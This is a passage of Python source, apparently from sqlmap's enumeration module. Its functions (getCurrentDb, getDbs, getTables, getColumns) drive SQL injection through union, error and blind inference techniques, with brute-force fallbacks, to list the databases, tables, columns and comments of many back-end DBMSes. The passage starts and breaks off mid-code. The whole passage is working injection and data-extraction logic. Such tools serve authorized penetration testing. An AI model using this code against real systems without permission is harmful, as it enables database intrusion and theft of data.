kb.data.currentDb = unArrayizeValue(inject.getValue(query, safeCharEncode=False))\n\n        if not kb.data.currentDb and Backend.isDbms(DBMS.VERTICA):\n            kb.data.currentDb = VERTICA_DEFAULT_SCHEMA\n\n        if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):\n            warnMsg = \"on %s you'll need to use \" % Backend.getIdentifiedDbms()\n            warnMsg += \"schema names for enumeration as the counterpart to database \"\n            warnMsg += \"names on other DBMSes\"\n            singleTimeWarnMessage(warnMsg)\n        elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.CUBRID):\n            warnMsg = \"on %s you'll need to use \" % Backend.getIdentifiedDbms()\n            warnMsg += \"user names for enumeration as the counterpart to database \"\n            warnMsg += \"names on other DBMSes\"\n            singleTimeWarnMessage(warnMsg)\n\n        return kb.data.currentDb\n\n    def getDbs(self):\n        if len(kb.data.cachedDbs) > 0:\n            return kb.data.cachedDbs\n\n        infoMsg = None\n\n        if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n            warnMsg = \"information_schema not available, \"\n            warnMsg += \"back-end DBMS is MySQL < 5. database \"\n            warnMsg += \"names will be fetched from 'mysql' database\"\n            logger.warning(warnMsg)\n\n        elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):\n            warnMsg = \"schema names are going to be used on %s \" % Backend.getIdentifiedDbms()\n            warnMsg += \"for enumeration as the counterpart to database \"\n            warnMsg += \"names on other DBMSes\"\n            logger.warning(warnMsg)\n\n            infoMsg = \"fetching database (schema) names\"\n\n        elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.CUBRID):\n            warnMsg = \"user names are going to be used on %s \" % Backend.getIdentifiedDbms()\n            warnMsg += \"for enumeration as the counterpart to database \"\n            warnMsg += \"names on other DBMSes\"\n            logger.warning(warnMsg)\n\n            infoMsg = \"fetching database (user) names\"\n\n        else:\n            infoMsg = \"fetching database names\"\n\n        if infoMsg:\n            logger.info(infoMsg)\n\n        rootQuery = queries[Backend.getIdentifiedDbms()].dbs\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                query = rootQuery.inband.query2\n            else:\n                query = rootQuery.inband.query\n            values = inject.getValue(query, blind=False, time=False)\n\n            if not isNoneValue(values):\n                kb.data.cachedDbs = arrayizeValue(values)\n\n        if not kb.data.cachedDbs and isInferenceAvailable() and not conf.direct:\n            infoMsg = \"fetching number of databases\"\n            logger.info(infoMsg)\n\n            if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                query = rootQuery.blind.count2\n            else:\n                query = rootQuery.blind.count\n            count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n            if not isNumPosStrValue(count):\n                errMsg = \"unable to retrieve the number of databases\"\n                logger.error(errMsg)\n            else:\n                plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES\n                indexRange = getLimitRange(count, plusOne=plusOne)\n\n                for index in indexRange:\n                    if Backend.isDbms(DBMS.SYBASE):\n                        query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else \" \")\n                    elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                        query = rootQuery.blind.query2 % index\n                    else:\n                        query = rootQuery.blind.query % index\n\n                    db = unArrayizeValue(inject.getValue(query, union=False, error=False))\n\n                    if not isNoneValue(db):\n                        kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db))\n\n        if not kb.data.cachedDbs and Backend.isDbms(DBMS.MSSQL):\n            if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n                blinds = (False, True)\n            else:\n                blinds = (True,)\n\n            for blind in blinds:\n                count = 0\n                kb.data.cachedDbs = []\n                while True:\n                    query = rootQuery.inband.query2 % count\n                    value = unArrayizeValue(inject.getValue(query, blind=blind))\n                    if not (value or \"\").strip():\n                        break\n                    else:\n                        kb.data.cachedDbs.append(value)\n                        count += 1\n                if kb.data.cachedDbs:\n                    break\n\n        if not kb.data.cachedDbs:\n            infoMsg = \"falling back to current database\"\n            logger.info(infoMsg)\n            self.getCurrentDb()\n\n            if kb.data.currentDb:\n                kb.data.cachedDbs = [kb.data.currentDb]\n            else:\n                errMsg = \"unable to retrieve the database names\"\n                raise SqlmapNoneDataException(errMsg)\n        else:\n            kb.data.cachedDbs.sort()\n\n        if kb.data.cachedDbs:\n            kb.data.cachedDbs = [_ for _ in set(flattenValue(kb.data.cachedDbs)) if _]\n\n        return kb.data.cachedDbs\n\n    def getTables(self, bruteForce=None):\n        if len(kb.data.cachedTables) > 0:\n            return kb.data.cachedTables\n\n        self.forceDbmsEnum()\n\n        if bruteForce is None:\n            if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                warnMsg = \"information_schema not available, \"\n                warnMsg += \"back-end DBMS is MySQL < 5.0\"\n                logger.warning(warnMsg)\n                bruteForce = True\n\n            elif Backend.getIdentifiedDbms() in (DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):\n                bruteForce = True\n\n            elif Backend.getIdentifiedDbms() in (DBMS.ACCESS,):\n                try:\n                    tables = self.getTables(False)\n                except SqlmapNoneDataException:\n                    tables = None\n\n                if not tables:\n                    warnMsg = \"cannot retrieve table names, \"\n                    warnMsg += \"back-end DBMS is %s\" % Backend.getIdentifiedDbms()\n                    logger.warning(warnMsg)\n                    bruteForce = True\n                else:\n                    return tables\n\n        if conf.db == CURRENT_DB:\n            conf.db = self.getCurrentDb()\n\n        if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n            conf.db = conf.db.upper()\n\n        if conf.db:\n            dbs = conf.db.split(',')\n        else:\n            dbs = self.getDbs()\n\n        dbs = [_ for _ in dbs if _ and _.strip()]\n\n        for db in dbs:\n            dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)\n\n        if bruteForce:\n            resumeAvailable = False\n\n            for db, table in kb.brute.tables:\n                if db == conf.db:\n                    resumeAvailable = True\n                    break\n\n            if resumeAvailable and not conf.freshQueries:\n                for db, table in kb.brute.tables:\n                    if db == conf.db:\n                        if conf.db not in kb.data.cachedTables:\n                            kb.data.cachedTables[conf.db] = [table]\n                        else:\n                            kb.data.cachedTables[conf.db].append(table)\n\n                return kb.data.cachedTables\n\n            message = \"do you want to use common table existence check? %s \" % (\"[Y/n/q]\" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else \"[y/N/q]\")\n            choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()\n\n            if choice == 'N':\n                return\n            elif choice == 'Q':\n                raise SqlmapUserQuitException\n            else:\n                return tableExists(paths.COMMON_TABLES)\n\n        infoMsg = \"fetching tables for database\"\n        infoMsg += \"%s: '%s'\" % (\"s\" if len(dbs) > 1 else \"\", \", \".join(unsafeSQLIdentificatorNaming(unArrayizeValue(db)) for db in sorted(dbs)))\n        logger.info(infoMsg)\n\n        rootQuery = queries[Backend.getIdentifiedDbms()].tables\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            values = []\n\n            for query, condition in ((rootQuery.inband.query, getattr(rootQuery.inband, \"condition\", None)), (getattr(rootQuery.inband, \"query2\", None), getattr(rootQuery.inband, \"condition2\", None))):\n                if not isNoneValue(values) or not query:\n                    break\n\n                if condition:\n                    if not Backend.isDbms(DBMS.SQLITE):\n                        query += \" WHERE %s\" % condition\n\n                        if conf.excludeSysDbs:\n                            infoMsg = \"skipping system database%s '%s'\" % (\"s\" if len(self.excludeDbsList) > 1 else \"\", \", \".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList))\n                            logger.info(infoMsg)\n                            query += \" IN (%s)\" % ','.join(\"'%s'\" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList)\n                        else:\n                            query += \" IN (%s)\" % ','.join(\"'%s'\" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs))\n\n                    if len(dbs) < 2 and (\"%s,\" % condition) in query:\n                        query = query.replace(\"%s,\" % condition, \"\", 1)\n\n                if query:\n                    values = inject.getValue(query, blind=False, time=False)\n\n            if not isNoneValue(values):\n                values = [_ for _ in arrayizeValue(values) if _]\n\n                if len(values) > 0 and not isListLike(values[0]):\n                    values = [(dbs[0], _) for _ in values]\n\n                for db, table in filterPairValues(values):\n                    table = unArrayizeValue(table)\n\n                    if not isNoneValue(table):\n                        db = safeSQLIdentificatorNaming(db)\n                        table = safeSQLIdentificatorNaming(table, True)\n\n                        if conf.getComments:\n                            _ = queries[Backend.getIdentifiedDbms()].table_comment\n                            if hasattr(_, \"query\"):\n                                if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE):\n                                    query = _.query % (unsafeSQLIdentificatorNaming(db.upper()), unsafeSQLIdentificatorNaming(table.upper()))\n                                else:\n                                    query = _.query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(table))\n\n                                comment = unArrayizeValue(inject.getValue(query, blind=False, time=False))\n                                if not isNoneValue(comment):\n                                    infoMsg = \"retrieved comment '%s' for table '%s'\" % (comment, unsafeSQLIdentificatorNaming(table))\n                                    if METADB_SUFFIX not in db:\n                                        infoMsg += \" in database '%s'\" % unsafeSQLIdentificatorNaming(db)\n                                    logger.info(infoMsg)\n                            else:\n                                warnMsg = \"on %s it is not \" % Backend.getIdentifiedDbms()\n                                warnMsg += \"possible to get table comments\"\n                                singleTimeWarnMessage(warnMsg)\n\n                        if db not in kb.data.cachedTables:\n                            kb.data.cachedTables[db] = [table]\n                        else:\n                            kb.data.cachedTables[db].append(table)\n\n        if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct:\n            for db in dbs:\n                if conf.excludeSysDbs and db in self.excludeDbsList:\n                    infoMsg = \"skipping system database '%s'\" % unsafeSQLIdentificatorNaming(db)\n                    logger.info(infoMsg)\n                    continue\n\n                if conf.exclude and re.search(conf.exclude, db, re.I) is not None:\n                    infoMsg = \"skipping database '%s'\" % unsafeSQLIdentificatorNaming(db)\n                    singleTimeLogMessage(infoMsg)\n                    continue\n\n                for _query, _count in ((rootQuery.blind.query, rootQuery.blind.count), (getattr(rootQuery.blind, \"query2\", None), getattr(rootQuery.blind, \"count2\", None))):\n                    if _query is None:\n                        break\n\n                    infoMsg = \"fetching number of tables for \"\n                    infoMsg += \"database '%s'\" % unsafeSQLIdentificatorNaming(db)\n                    logger.info(infoMsg)\n\n                    if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB):\n                        query = _count % unsafeSQLIdentificatorNaming(db)\n                    else:\n                        query = _count\n\n                    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                    if count == 0:\n                        warnMsg = \"database '%s' \" % unsafeSQLIdentificatorNaming(db)\n                        warnMsg += \"appears to be empty\"\n                        logger.warning(warnMsg)\n                        break\n\n                    elif not isNumPosStrValue(count):\n                        warnMsg = \"unable to retrieve the number of \"\n                        warnMsg += \"tables for database '%s'\" % unsafeSQLIdentificatorNaming(db)\n                        singleTimeWarnMessage(warnMsg)\n                        continue\n\n                    tables = []\n\n                    plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES\n                    indexRange = getLimitRange(count, plusOne=plusOne)\n\n                    for index in indexRange:\n                        if Backend.isDbms(DBMS.SYBASE):\n                            query = _query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else \" \"))\n                        elif Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB):\n                            query = _query % (kb.data.cachedTables[-1] if kb.data.cachedTables else \" \")\n                        elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):\n                            query = _query % index\n                        elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX, DBMS.FRONTBASE, DBMS.VIRTUOSO):\n                            query = _query % (index, unsafeSQLIdentificatorNaming(db))\n                        else:\n                            query = _query % (unsafeSQLIdentificatorNaming(db), index)\n\n                        table = unArrayizeValue(inject.getValue(query, union=False, error=False))\n\n                        if not isNoneValue(table):\n                            kb.hintValue = table\n                            table = safeSQLIdentificatorNaming(table, True)\n                            tables.append(table)\n\n                    if tables:\n                        kb.data.cachedTables[db] = tables\n\n                        if conf.getComments:\n                            for table in tables:\n                                _ = queries[Backend.getIdentifiedDbms()].table_comment\n                                if hasattr(_, \"query\"):\n                                    if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE):\n                                        query = _.query % (unsafeSQLIdentificatorNaming(db.upper()), unsafeSQLIdentificatorNaming(table.upper()))\n                                    else:\n                                        query = _.query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(table))\n\n                                    comment = unArrayizeValue(inject.getValue(query, union=False, error=False))\n                                    if not isNoneValue(comment):\n                                        infoMsg = \"retrieved comment '%s' for table '%s'\" % (comment, unsafeSQLIdentificatorNaming(table))\n                                        if METADB_SUFFIX not in db:\n                                            infoMsg += \" in database '%s'\" % unsafeSQLIdentificatorNaming(db)\n                                        logger.info(infoMsg)\n                                else:\n                                    warnMsg = \"on %s it is not \" % Backend.getIdentifiedDbms()\n                                    warnMsg += \"possible to get table comments\"\n                                    singleTimeWarnMessage(warnMsg)\n\n                        break\n                    else:\n                        warnMsg = \"unable to retrieve the table names \"\n                        warnMsg += \"for database '%s'\" % unsafeSQLIdentificatorNaming(db)\n                        logger.warning(warnMsg)\n\n        if isNoneValue(kb.data.cachedTables):\n            kb.data.cachedTables.clear()\n\n        if not kb.data.cachedTables:\n            errMsg = \"unable to retrieve the table names for any database\"\n            if bruteForce is None:\n                logger.error(errMsg)\n                return self.getTables(bruteForce=True)\n            elif not conf.search:\n                raise SqlmapNoneDataException(errMsg)\n        else:\n            for db, tables in kb.data.cachedTables.items():\n                kb.data.cachedTables[db] = sorted(tables) if tables else tables\n\n        if kb.data.cachedTables:\n            for db in kb.data.cachedTables:\n                kb.data.cachedTables[db] = list(set(kb.data.cachedTables[db]))\n\n        return kb.data.cachedTables\n\n    def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False):\n        self.forceDbmsEnum()\n\n        if conf.db is None or conf.db == CURRENT_DB:\n            if conf.db is None:\n                warnMsg = \"missing database parameter. sqlmap is going \"\n                warnMsg += \"to use the current database to enumerate \"\n                warnMsg += \"table(s) columns\"\n                logger.warning(warnMsg)\n\n            conf.db = self.getCurrentDb()\n\n            if not conf.db:\n                errMsg = \"unable to retrieve the current \"\n                errMsg += \"database name\"\n                raise SqlmapNoneDataException(errMsg)\n\n        elif conf.db is not None:\n            if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n                conf.db = conf.db.upper()\n\n            if ',' in conf.db:\n                errMsg = \"only one database name is allowed when enumerating \"\n                errMsg += \"the tables' columns\"\n                raise SqlmapMissingMandatoryOptionException(errMsg)\n\n        conf.db = safeSQLIdentificatorNaming(conf.db)\n\n        if conf.col:\n            if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n                conf.col = conf.col.upper()\n\n            colList = conf.col.split(',')\n        else:\n            colList = []\n\n        if conf.exclude:\n            colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]\n\n        for col in colList:\n            colList[colList.index(col)] = safeSQLIdentificatorNaming(col)\n\n        colList = [_ for _ in colList if _]\n\n        if conf.tbl:\n            if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n                conf.tbl = conf.tbl.upper()\n\n            tblList = conf.tbl.split(',')\n        else:\n            self.getTables()\n\n            if len(kb.data.cachedTables) > 0:\n                if conf.db in kb.data.cachedTables:\n                    tblList = kb.data.cachedTables[conf.db]\n                else:\n                    tblList = list(six.itervalues(kb.data.cachedTables))\n\n                if tblList and isListLike(tblList[0]):\n                    tblList = tblList[0]\n\n                tblList = list(tblList)\n            elif not conf.search:\n                errMsg = \"unable to retrieve the tables\"\n                if METADB_SUFFIX not in conf.db:\n                    errMsg += \" in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                raise SqlmapNoneDataException(errMsg)\n            else:\n                return kb.data.cachedColumns\n\n        if conf.exclude:\n            tblList = [_ for _ in tblList if re.search(conf.exclude, _, re.I) is None]\n\n        tblList = filterNone(safeSQLIdentificatorNaming(_, True) for _ in tblList)\n\n        if bruteForce is None:\n            if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                warnMsg = \"information_schema not available, \"\n                warnMsg += \"back-end DBMS is MySQL < 5.0\"\n                logger.warning(warnMsg)\n                bruteForce = True\n\n            elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):\n                warnMsg = \"cannot retrieve column names, \"\n                warnMsg += \"back-end DBMS is %s\" % Backend.getIdentifiedDbms()\n                singleTimeWarnMessage(warnMsg)\n                bruteForce = True\n\n        if bruteForce:\n            resumeAvailable = False\n\n            for tbl in tblList:\n                for db, table, colName, colType in kb.brute.columns:\n                    if db == conf.db and table == tbl:\n                        resumeAvailable = True\n                        break\n\n            if resumeAvailable and not (conf.freshQueries and not colList):\n                columns = {}\n\n                for column in colList:\n                    columns[column] = None\n\n                for tbl in tblList:\n                    for db, table, colName, colType in kb.brute.columns:\n                        if db == conf.db and table == tbl:\n                            columns[colName] = colType\n\n                    if conf.db in kb.data.cachedColumns:\n                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns\n                    else:\n                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns}\n\n                return kb.data.cachedColumns\n\n            if kb.choices.columnExists is None:\n                message = \"do you want to use common column existence check? %s\" % (\"[Y/n/q]\" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else \"[y/N/q]\")\n                kb.choices.columnExists = readInput(message, default='Y' if 'Y' in message else 'N').upper()\n\n            if kb.choices.columnExists == 'N':\n                if dumpMode and colList:\n                    kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): dict((_, None) for _ in colList)}\n                    return kb.data.cachedColumns\n                else:\n                    return None\n            elif kb.choices.columnExists == 'Q':\n                raise SqlmapUserQuitException\n            else:\n                return columnExists(paths.COMMON_COLUMNS)\n\n        rootQuery = queries[Backend.getIdentifiedDbms()].columns\n        condition = rootQuery.blind.condition if 'condition' in rootQuery.blind else None\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            for tbl in tblList:\n                if conf.db is not None and len(kb.data.cachedColumns) > 0 \\\n                   and conf.db in kb.data.cachedColumns and tbl in \\\n                   kb.data.cachedColumns[conf.db]:\n                    infoMsg = \"fetched table columns from \"\n                    infoMsg += \"database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                    logger.info(infoMsg)\n\n                    return {conf.db: kb.data.cachedColumns[conf.db]}\n\n                infoMsg = \"fetching columns \"\n                condQuery = \"\"\n\n                if len(colList) > 0:\n                    if colTuple:\n                        _, colCondParam = colTuple\n                        infoMsg += \"LIKE '%s' \" % \", \".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))\n                    else:\n                        colCondParam = \"='%s'\"\n                        infoMsg += \"'%s' \" % \", \".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))\n\n                    condQueryStr = \"%%s%s\" % colCondParam\n                    condQuery = \" AND (%s)\" % \" OR \".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))\n\n                if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):\n                    query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))\n                    query += condQuery\n\n                    if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):\n                        query = re.sub(\"column_type\", \"data_type\", query, flags=re.I)\n\n                elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):\n                    query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))\n                    query += condQuery\n\n                elif Backend.isDbms(DBMS.MSSQL):\n                    query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db,\n                                                      conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(\".\")[-1])\n                    query += condQuery.replace(\"[DB]\", conf.db)\n\n                elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):\n                    query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl)\n\n                elif Backend.isDbms(DBMS.INFORMIX):\n                    query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))\n                    query += condQuery\n\n                if dumpMode and colList:\n                    values = [(_,) for _ in colList]\n                else:\n                    infoMsg += \"for table '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n                    if METADB_SUFFIX not in conf.db:\n                        infoMsg += \"in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                    logger.info(infoMsg)\n\n                    values = None\n\n                    if values is None:\n                        values = inject.getValue(query, blind=False, time=False)\n                        if values and isinstance(values[0], six.string_types):\n                            values = [values]\n\n                if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):\n                    index, values = 1, []\n\n                    while True:\n                        query = rootQuery.inband.query2 % (conf.db, unsafeSQLIdentificatorNaming(tbl), index)\n                        value = unArrayizeValue(inject.getValue(query, blind=False, time=False))\n\n                        if isNoneValue(value) or value == \" \":\n                            break\n                        else:\n                            values.append((value,))\n                            index += 1\n\n                if Backend.isDbms(DBMS.SQLITE):\n                    if dumpMode and colList:\n                        if conf.db not in kb.data.cachedColumns:\n                            kb.data.cachedColumns[conf.db] = {}\n                        kb.data.cachedColumns[conf.db][safeSQLIdentificatorNaming(conf.tbl, True)] = dict((_, None) for _ in colList)\n                    else:\n                        parseSqliteTableSchema(unArrayizeValue(values))\n\n                elif not isNoneValue(values):\n                    table = {}\n                    columns = {}\n\n                    for columnData in values:\n                        if not isNoneValue(columnData):\n                            columnData = [unArrayizeValue(_) for _ in columnData]\n                            name = safeSQLIdentificatorNaming(columnData[0])\n\n                            if name:\n                                if conf.getComments:\n                                    _ = queries[Backend.getIdentifiedDbms()].column_comment\n                                    if hasattr(_, \"query\"):\n                                        if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n                                            query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper()))\n                                        else:\n                                            query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name))\n\n                                        comment = unArrayizeValue(inject.getValue(query, blind=False, time=False))\n                                        if not isNoneValue(comment):\n                                            infoMsg = \"retrieved comment '%s' for column '%s'\" % (comment, name)\n                                            logger.info(infoMsg)\n                                    else:\n                                        warnMsg = \"on %s it is not \" % Backend.getIdentifiedDbms()\n                                        warnMsg += \"possible to get column comments\"\n                                        singleTimeWarnMessage(warnMsg)\n\n                                if len(columnData) == 1:\n                                    columns[name] = None\n                                else:\n                                    key = int(columnData[1]) if isinstance(columnData[1], six.string_types) and columnData[1].isdigit() else columnData[1]\n                                    if Backend.isDbms(DBMS.FIREBIRD):\n                                        columnData[1] = FIREBIRD_TYPES.get(key, columnData[1])\n                                    elif Backend.isDbms(DBMS.ALTIBASE):\n                                        columnData[1] = ALTIBASE_TYPES.get(key, columnData[1])\n                                    elif Backend.isDbms(DBMS.INFORMIX):\n                                        notNull = False\n                                        if isinstance(key, int) and key > 255:\n                                            key -= 256\n                                            notNull = True\n                                        columnData[1] = INFORMIX_TYPES.get(key, columnData[1])\n                                        if notNull:\n                                            columnData[1] = \"%s NOT NULL\" % columnData[1]\n\n                                    columns[name] = columnData[1]\n\n                    if conf.db in kb.data.cachedColumns:\n                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns\n                    else:\n                        table[safeSQLIdentificatorNaming(tbl, True)] = columns\n                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table\n\n        elif isInferenceAvailable() and not conf.direct:\n            for tbl in tblList:\n                if conf.db is not None and len(kb.data.cachedColumns) > 0 \\\n                   and conf.db in kb.data.cachedColumns and tbl in \\\n                   kb.data.cachedColumns[conf.db]:\n                    infoMsg = \"fetched table columns from \"\n                    infoMsg += \"database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                    logger.info(infoMsg)\n\n                    return {conf.db: kb.data.cachedColumns[conf.db]}\n\n                infoMsg = \"fetching columns \"\n                condQuery = \"\"\n\n                if len(colList) > 0:\n                    if colTuple:\n                        _, colCondParam = colTuple\n                        infoMsg += \"LIKE '%s' \" % \", \".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))\n                    else:\n                        colCondParam = \"='%s'\"\n                        infoMsg += \"'%s' \" % \", \".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))\n\n                    condQueryStr = \"%%s%s\" % colCondParam\n                    condQuery = \" AND (%s)\" % \" OR \".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))\n\n                if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):\n                    query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))\n                    query += condQuery\n\n                elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):\n                    query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))\n                    query += condQuery\n\n                elif Backend.isDbms(DBMS.MSSQL):\n                    query = rootQuery.blind.count % (conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(\".\")[-1])\n                    query += condQuery.replace(\"[DB]\", conf.db)\n\n                elif Backend.isDbms(DBMS.FIREBIRD):\n                    query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl)\n                    query += condQuery\n\n                elif Backend.isDbms(DBMS.INFORMIX):\n                    query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))\n                    query += condQuery\n\n                elif Backend.isDbms(DBMS.SQLITE):\n                    if dumpMode and colList:\n                        if conf.db not in kb.data.cachedColumns:\n                            kb.data.cachedColumns[conf.db] = {}\n                        kb.data.cachedColumns[conf.db][safeSQLIdentificatorNaming(conf.tbl, True)] = dict((_, None) for _ in colList)\n                    else:\n                        query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl)\n                        value = unArrayizeValue(inject.getValue(query, union=False, error=False))\n                        parseSqliteTableSchema(unArrayizeValue(value))\n\n                    return kb.data.cachedColumns\n\n                table = {}\n                columns = {}\n\n                if dumpMode and colList:\n                    count = 0\n                    for value in colList:\n                        columns[safeSQLIdentificatorNaming(value)] = None\n                else:\n                    infoMsg += \"for table '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n                    if METADB_SUFFIX not in conf.db:\n                        infoMsg += \"in database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                    logger.info(infoMsg)\n\n                    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                    if not isNumPosStrValue(count):\n                        if Backend.isDbms(DBMS.MSSQL):\n                            count, index, values = 0, 1, []\n                            while True:\n                                query = rootQuery.blind.query3 % (conf.db, unsafeSQLIdentificatorNaming(tbl), index)\n                                value = unArrayizeValue(inject.getValue(query, union=False, error=False))\n\n                                if 